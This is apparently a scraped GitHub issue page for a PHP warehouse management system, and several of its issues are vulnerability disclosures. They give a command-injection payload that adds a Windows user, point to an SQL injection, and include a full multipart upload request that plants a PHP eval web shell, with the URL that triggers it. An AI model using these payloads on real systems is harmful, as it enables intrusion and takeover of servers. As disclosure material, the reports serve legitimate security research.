feminer / wms Goto Github PK
View Code? Open in Web Editor NEW企业仓库管理系统
License: MIT License
企业仓库管理系统
License: MIT License
货品信息管理
返回信息:本站暂无货品!
可以直接使用吗,看设计是蛮详细的
Command execution
1.1
Windows Server 2012
PHP 5.5.38
Apache 2.4
Mysql 5.6
During installation, use the db_wms_2013_12_31_15_48_34.sql file in the \system\ directory for installation
In the /system/databak.php file, the parameter filename was received through $_POST, and it was not filtered. The exec function was brought in, resulting in a command execution vulnerability.
There is no echo here, let's test adding a system user here
payload: filename=1 || net user test /add
SQL injection in http://localhost/wms/src/basic/editinout.php
The GET parameter "id" is passed without filtering to SQL sentence which causes the vulnerability.
管理员用户名和密码是多少,只知道用户名是hust
Warning: mysql_connect(): Access denied for user 'root'@'localhost' (using password: YES) in D:\phpstudy_pro\WWW\wms\conn\conn.php on line 2
数据库服务器连接错误Access denied for user 'root'@'localhost' (using password: YES)
Upfile is a parameter for uploading pictures,
The upfile from POST is assigned to $upfile
Then let's look at lines 45-64 of the code
It can be seen that the uploaded files are stored in the upimages directory, and the file naming rules are 1.jpg, 2.jpg, and then add 1
POC:
POST /product/savenewproduct.php?flag=1 HTTP/1.1
Host: xxxx
Content-Length: 1507
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wmsvul.test
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryONFXfH9gn2T6Gxal
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://wmsvul.test/product/addproduct.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=qo4cusl0vp4mame43ssakta695
Connection: close
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="typeid"
0001
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="name"
123123123123
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="encode"
1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="barcode"
1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="size"
1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="unit"
None
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="upperlimit"
1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="lowerlimit"
10
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="inprice"
1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="outprice"
123
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2000000
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="upfile"; filename="POC.php"
Content-Type: application/octet-stream
<?php @eval($_GET['ace']);?>
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="jianjie"
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="submit"
添加
------WebKitFormBoundaryONFXfH9gn2T6Gxal--
Since the uploaded file was not verified, the PHP file was uploaded successfully and was named 1.php
Then, we access the PHP file to execute the code
POC:
http://wmsvul.test/product/upimages/1.php?ace=phpinfo();
Hey there!
I belong to an open source security research community, and a member (@wtwver) has found an issue, but doesn’t know the best way to disclose it.
If not a hassle, might you kindly add a SECURITY.md
file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.
Thank you for your consideration, and I look forward to hearing from you!
(cc @huntr-helper)
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.